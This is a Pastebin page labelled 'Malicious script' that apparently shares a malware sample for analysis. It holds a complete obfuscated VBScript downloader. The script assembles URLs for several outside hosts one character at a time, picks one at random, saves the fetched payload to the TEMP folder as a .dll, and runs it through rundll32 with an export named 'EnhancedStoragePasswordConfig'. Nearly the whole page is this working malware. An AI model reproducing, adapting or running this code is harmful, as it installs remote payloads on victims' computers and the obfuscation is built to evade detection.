SHARE
TWEET

Malicious script

dynamoo Oct 31st, 2016 113 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const BQb = 1, Ue = 2, Kn = 8
  3. Const UEs = 1, WLv9 = 2, GEw9 = "437", KYp = 2
  4. Function SDu6(BVt)
  5. Dim Qx4, Xi, SAx1
  6. Set Qx4 = CreateObject("ADODB.Stream")
  7. Qx4.type = WLv9
  8. Qx4.Charset = GEw9
  9. Qx4.Open
  10. Qx4.LoadFromFile BVt
  11. SAx1 = Qx4.ReadText
  12. Qx4.Close
  13. SDu6 = ZBd(SAx1)
  14. End Function
  15. Sub VKq4(BVt, Pg0)
  16. Dim Qx4, SAx1
  17. Set Qx4 = CreateObject("ADODB.Stream")
  18. Qx4.type = WLv9
  19. Qx4.Charset = GEw9
  20. Qx4.Open
  21. SAx1 = ALs(Pg0)
  22. Qx4.WriteText SAx1
  23. Qx4.SaveToFile BVt, KYp
  24. Qx4.Close
  25. End Sub
  26. Function Cv3(NHa0)
  27. Dim SAx1, YLy5(0)
  28. If NHa0 <= 0 Then
  29. Err.Raise 50001, "", "asdfasdf", "", 0
  30. ElseIf NHa0 = 1 Then
  31. Cv3 = YLy5
  32. Else
  33. SAx1 = Space(NHa0-1)
  34. Cv3 = Split(SAx1, " ")
  35. End If
  36. End Function
  37. Function Cl3(url)
  38. Dim DRq9, Zb9, Xi, Ox9
  39. Dim Ir7, VMo(1)
  40. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  41. VMo(0) = "WinHttp.WinHttpRequest.5.1"
  42. VMo(1) = "MSXML2.XMLHTTP"
  43. For Each Ir7 in VMo
  44. Err.Clear
  45. Set Zb9 = CreateObject(Ir7)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. Zb9.Open "GET", url, False
  51. Zb9.Send
  52. Xi = Cv3(LenB(Zb9.ResponseBody))
  53. For Ox9 = 1 To LenB(Zb9.ResponseBody)
  54. Xi(Ox9-1) = AscB(MidB(Zb9.ResponseBody, Ox9, 1))
  55. Next
  56. Cl3 = Xi
  57. End Function
  58. Sub DQs( It, OJm )
  59. Dim Ox9, Yp1, DRq9, Zb9, Ah9
  60. Set DRq9 = CreateObject( "Scripting.FileSystemObject" )
  61. If DRq9.FolderExists( OJm ) Then
  62. Ah9 = DRq9.BuildPath( OJm, Mid( It, InStrRev( It, "/" ) + 1 ) )
  63. ElseIf DRq9.FolderExists( Left( OJm, InStrRev( OJm, "\" ) - 1 ) ) Then
  64. Ah9 = OJm
  65. Else
  66. WScript.Echo "ERROR: Target folder not found."
  67. Exit Sub
  68. End If
  69. Set Yp1 = DRq9.OpenTextFile( Ah9, Ue, True )
  70. Set Zb9 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
  71. Zb9.Open "GET", It, False
  72. Zb9.Send
  73. For Ox9 = 1 To LenB( Zb9.ResponseBody )
  74. Yp1.Write Chr( AscB( MidB( Zb9.ResponseBody, Ox9, 1 ) ) )
  75. Next
  76. Yp1.Close( )
  77. End Sub
  78. Function FSn7()
  79. Dim Lw6, Sz, ROm
  80. Set Lw6 = CreateObject("WScript.Shell")
  81. Set Sz = Lw6.Environment("System")
  82. ROm = Sz("PROCESSOR_ARCHITECTURE")
  83. If LCase(ROm) = "amd64" Then
  84. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  85. Else
  86. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  87. End If
  88. End Function
  89. Sub Ab(Bx0, Jn0, QRs5)
  90. Dim Lw6, DRq9, Yp1, Sd, Ib1
  91. Set Lw6 = CreateObject("WScript.Shell")
  92. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  93. Set Yp1 = DRq9.GetFile(Bx0)
  94. Sd = Yp1.ShortPath
  95. Ib1 = FSn7() + " " + Sd + "," + Jn0 + " " + QRs5
  96. If 2 > 1 Then
  97. Lw6.Run(Ib1)
  98. End If
  99. End Sub
  100. Function NMa6(Bx0)
  101. Dim DRq9
  102. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  103. NMa6 = DRq9.FileExists(Bx0)
  104. End Function
  105. Function SWu0(Bx0)
  106. Dim DRq9, Yp1
  107. Set DRq9 = CreateObject("Scripting.FileSystemObject")
  108. Set Yp1 = DRq9.GetFile(Bx0)
  109. SWu0 = Yp1.ShortPath
  110. End Function
  111. Function TEv5(CTi, Nh0)
  112. Dim NHa0
  113. NHa0 = CDbl(Int(CDbl(CTi)/CDbl(Nh0)))
  114. TEv5 = CDbl(CTi) - NHa0 * CDbl(Nh0)
  115. End Function
  116. Function Ng(LCl0, SAx1)
  117. SAx1(1) = 172 * SAx1(1) Mod 30307
  118. SAx1(0) = 171 * SAx1(0) Mod 30269
  119. SAx1(2) = 170 * SAx1(2) Mod 30323
  120. Dim Lp3
  121. Lp3 = TEv5((CDbl(SAx1(0))/30269.0 + CDbl(SAx1(1))/30307.0 + CDbl(SAx1(2))/30323.0), 1.0)
  122. Ng = Int(Lp3 * CDbl(LCl0))
  123. End Function
  124. Function Yg0(KFe)
  125. Yg0 = CInt(KFe*Rnd())
  126. End Function
  127. Sub Jo(LQh)
  128. WScript.Sleep(LQh)
  129. End Sub
  130. Randomize
  131. Dim Je(2), AMb, BJy(4), BVt
  132. Je(0) = 1256
  133. Je(1) = 21487
  134. Je(2) = 14252
  135. AMb = 21
  136. If 1=1 Then
  137. BJy(0) = "http://" & "t" & "a" & "s" & "t" & "e" & "b" & "u" & "d" & "s" & "m" & "a" & "r" & "k" & "e" & "t" & "i" & "n" & "g" & "." & "c" & "o" & "m" & "/" & "u" & "w" & "6" & "l" & "i" & "n"
  138. End If
  139. If 1=1 Then
  140. BJy(1) = "http://" & "m" & "e" & "c" & "h" & "a" & "p" & "." & "c" & "o" & "m" & "/" & "x" & "d" & "7" & "u" & "h"
  141. End If
  142. If 1=1 Then
  143. BJy(2) = "http://" & "c" & "o" & "f" & "f" & "e" & "e" & "t" & "e" & "a" & "s" & "h" & "o" & "p" & "." & "r" & "u" & "/" & "d" & "a" & "z" & "2" & "r" & "p"
  144. End If
  145. If 1=1 Then
  146. BJy(3) = "http://" & "f" & "i" & "c" & "u" & "s" & "s" & "a" & "l" & "m" & "." & "c" & "o" & "m" & "/" & "0" & "b" & "q" & "z" & "c" & "n" & "9" & "6"
  147. End If
  148. If 1=1 Then
  149. BJy(4) = "http://" & "w" & "a" & "y" & "n" & "e" & "s" & "i" & "n" & "e" & "w" & "." & "c" & "o" & "m" & "/" & "0" & "f" & "q" & "t" & "9" & "h" & "e" & "1"
  150. End If
  151. BVt = "Tqg8ceGBV4iU4AM2"
  152. Dim Lw6, Nj, Zj, Sg5, LQh
  153. Set objShell = CreateObject("WS"&"cript.Shell")
  154. Nj = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
  155. Dim ODc, FOl8, JPf0, Wn9, Ox9
  156. FOl8 = False
  157. For Ox9=0 To 10: Do
  158. Zj = Nj + "\" + BVt + CStr(Ox9) + ".dll"
  159. If NMa6(Zj) Then
  160. Sg5 = SWu0(Zj) & ".txt"
  161. If NMa6(Sg5) Then
  162. WScript.Quit(0)
  163. End If
  164. End If
  165. If Not FOl8 Then
  166. ODc = Yg0(UBound(BJy))
  167. DQs BJy(ODc), Zj
  168. If Err.Number <> 0 Then
  169. Exit Do
  170. End If
  171. FOl8 = True
  172. End If
  173. Ab Zj, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
  174. LQh = 24700
  175. Jo LQh
  176. Loop While False: Next
  177. If 3=3 Then
  178. WScript.Quit(1)
  179. End If
RAW Paste Data
Top